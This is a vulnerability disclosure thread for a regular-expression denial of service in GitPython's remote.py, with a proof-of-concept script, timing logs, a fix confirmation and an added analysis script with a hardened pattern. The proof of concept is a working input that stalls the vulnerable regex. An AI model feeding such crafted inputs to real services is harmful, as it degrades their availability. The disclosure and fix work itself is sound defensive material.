Inefficient Regular Expression Complexity in gitpython-developers/gitpython

Valid

Reported on

Feb 10th 2022


Description

In the latest version of GitPython (cd29f07b) I discovered a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Proof of Concept

PoC based on code in git/remote.py

import logging
import re

logging.basicConfig(format='%(asctime)s - %(levelname)s: %(message)s',
                    level=logging.DEBUG)

pattern = re.compile(r'^\s*(.) (\[?[\w\s\.$@]+\]?)\s+(.+) -> ([^\s]+)(    \(.*\)?$)?')

for i in range(1, 10000):
    s = ' ' * i * 100 + '->'
    logging.debug('Started with {} spaces'.format(i * 100))
    pattern.match(s)
    logging.debug('Finished with {} spaces'.format(i * 100))

Output:

2022-02-10 21:05:36,247 - DEBUG: Started with 100 spaces
2022-02-10 21:05:36,326 - DEBUG: Finished with 100 spaces
2022-02-10 21:05:36,326 - DEBUG: Started with 200 spaces
2022-02-10 21:05:38,765 - DEBUG: Finished with 200 spaces
2022-02-10 21:05:38,765 - DEBUG: Started with 300 spaces
2022-02-10 21:05:50,383 - DEBUG: Finished with 300 spaces
2022-02-10 21:05:50,383 - DEBUG: Started with 400 spaces
2022-02-10 21:06:22,743 - DEBUG: Finished with 400 spaces
2022-02-10 21:06:22,743 - DEBUG: Started with 500 spaces
2022-02-10 21:07:41,996 - DEBUG: Finished with 500 spaces
2022-02-10 21:07:41,997 - DEBUG: Started with 600 spaces
2022-02-10 21:10:23,773 - DEBUG: Finished with 600 spaces
2022-02-10 21:10:23,774 - DEBUG: Started with 700 spaces
2022-02-10 21:15:21,380 - DEBUG: Finished with 700 spaces
2022-02-10 21:15:21,380 - DEBUG: Started with 800 spaces
2022-02-10 21:23:46,983 - DEBUG: Finished with 800 spaces

Impact

This issue may lead to a denial of service if a user controls the input passed to the pattern-matching function.

Occurrences

We are processing your report and will contact the gitpython-developers/gitpython team within 24 hours. (a year ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md. (a year ago)
We have contacted a member of the gitpython-developers/gitpython team and are waiting to hear back. (a year ago)
gitpython-developers/gitpython maintainer validated this vulnerability. (a year ago)
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the gitpython-developers/gitpython team. We will try again in 7 days. (a year ago)
a year ago

Maintainer


Please set this issue to 'needs help' so the system can stop sending reminders of a fix that I am not working on. Thank you.

Jamie Slome
a year ago

Admin


@theworstcomrade - can you support the creation of a fix here?

theworstcomrade
a year ago

Researcher


@admin @maintainer sorry for your wait. Please check my fix. I ran it with the built-in tests and with my testing script, and all looked good.

2022-02-18 16:28:43,250 - DEBUG: Started with 100 spaces
2022-02-18 16:28:43,250 - DEBUG: Finished with 100 spaces
2022-02-18 16:28:43,250 - DEBUG: Started with 200 spaces
2022-02-18 16:28:43,251 - DEBUG: Finished with 200 spaces
2022-02-18 16:28:43,251 - DEBUG: Started with 300 spaces
2022-02-18 16:28:43,251 - DEBUG: Finished with 300 spaces
2022-02-18 16:28:43,251 - DEBUG: Started with 400 spaces
2022-02-18 16:28:43,251 - DEBUG: Finished with 400 spaces
2022-02-18 16:28:43,251 - DEBUG: Started with 500 spaces
2022-02-18 16:28:43,252 - DEBUG: Finished with 500 spaces
2022-02-18 16:28:43,252 - DEBUG: Started with 600 spaces
2022-02-18 16:28:43,252 - DEBUG: Finished with 600 spaces
2022-02-18 16:28:43,252 - DEBUG: Started with 700 spaces
2022-02-18 16:28:43,252 - DEBUG: Finished with 700 spaces
2022-02-18 16:28:43,252 - DEBUG: Started with 800 spaces
2022-02-18 16:28:43,253 - DEBUG: Finished with 800 spaces
2022-02-18 16:28:43,253 - DEBUG: Started with 900 spaces
2022-02-18 16:28:43,253 - DEBUG: Finished with 900 spaces
2022-02-18 16:28:43,253 - DEBUG: Started with 1000 spaces
2022-02-18 16:28:43,253 - DEBUG: Finished with 1000 spaces
2022-02-18 16:28:43,253 - DEBUG: Started with 1100 spaces
2022-02-18 16:28:43,254 - DEBUG: Finished with 1100 spaces
2022-02-18 16:28:43,254 - DEBUG: Started with 1200 spaces
2022-02-18 16:28:43,254 - DEBUG: Finished with 1200 spaces
2022-02-18 16:28:43,254 - DEBUG: Started with 1300 spaces
2022-02-18 16:28:43,255 - DEBUG: Finished with 1300 spaces
2022-02-18 16:28:43,255 - DEBUG: Started with 1400 spaces
2022-02-18 16:28:43,255 - DEBUG: Finished with 1400 spaces
2022-02-18 16:28:43,255 - DEBUG: Started with 1500 spaces
2022-02-18 16:28:43,255 - DEBUG: Finished with 1500 spaces
2022-02-18 16:28:43,256 - DEBUG: Started with 1600 spaces
2022-02-18 16:28:43,256 - DEBUG: Finished with 1600 spaces
2022-02-18 16:28:43,256 - DEBUG: Started with 1700 spaces
2022-02-18 16:28:43,256 - DEBUG: Finished with 1700 spaces
2022-02-18 16:28:43,256 - DEBUG: Started with 1800 spaces
2022-02-18 16:28:43,257 - DEBUG: Finished with 1800 spaces
Jamie Slome
a year ago

Admin


@theworstcomrade - great 👍

a year ago

Maintainer


Thanks a lot for the help! What would the next step be to be able to confirm this as a fix?

Jamie Slome
a year ago

Admin


Just hit the green confirm fix button on the right, and fill in the modal.

Also, be sure to select @theworstcomrade as the fixer when filling out the form. Let me know if you have any questions.

gitpython-developers/gitpython maintainer marked this as fixed in 3.1.27 with commit 75f4f6 (a year ago)
theworstcomrade has been awarded the fix bounty
This vulnerability will not receive a CVE
remote.py#L276 has been validated
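
The PoC above runs for hours; as an added example (not GitPython's code and not the change made in commit 75f4f6), the script below estimates the growth exponent of the reported pattern on the PoC's input shape in about a second and compares it with an illustrative hardened variant. `HARDENED`, `poc_input`, `best_time`, `growth_exponent` and `SAMPLE` are names and values assumed here.

```python
import math
import re
import time

# Pattern quoted in the report's PoC (based on git/remote.py).
VULNERABLE = re.compile(r'^\s*(.) (\[?[\w\s\.$@]+\]?)\s+(.+) -> ([^\s]+)(    \(.*\)?$)?')

# Illustrative hardened variant (an assumption, not the project's commit):
# the leading run and the separator match literal spaces only, and the summary
# is either a bracketed phrase or a token without spaces, so the leading run,
# the flag and the summary can no longer all consume the same run of spaces.
# ' +' and '(.+)' still overlap, so this lowers the worst case; it is not linear.
HARDENED = re.compile(r'^ *(.) (\[[\w .$@]+\]|[\w.$@]+) +(.+) -> (\S+)(    \(.*\)?$)?')

def poc_input(n):
    """The report's input shape: n spaces followed by '->' (never matches)."""
    return ' ' * n + '->'

def best_time(pattern, text, repeats=3):
    """Minimum wall-clock time of pattern.match(text) over a few runs."""
    best = float('inf')
    for _ in range(repeats):
        start = time.perf_counter()
        pattern.match(text)
        best = min(best, time.perf_counter() - start)
    return best

def growth_exponent(pattern, sizes=(30, 60, 120)):
    """Estimate k in time ~ n**k from the smallest and largest input size."""
    t_small = best_time(pattern, poc_input(sizes[0]))
    t_large = best_time(pattern, poc_input(sizes[-1]))
    return math.log(t_large / t_small) / math.log(sizes[-1] / sizes[0])

# Constructed sample of a fetch progress line (not taken from the report).
SAMPLE = ' * [new branch]      main       -> origin/main'

if __name__ == '__main__':
    print('vulnerable exponent ~ %.1f' % growth_exponent(VULNERABLE))
    print('hardened on 20000 spaces:', HARDENED.match(poc_input(20000)))
    print('hardened groups:', HARDENED.match(SAMPLE).group(1, 2, 4))
```

An exponent near 4 for `VULNERABLE` is consistent with the report's output, where doubling the input from 400 to 800 spaces multiplies the match time by roughly 16.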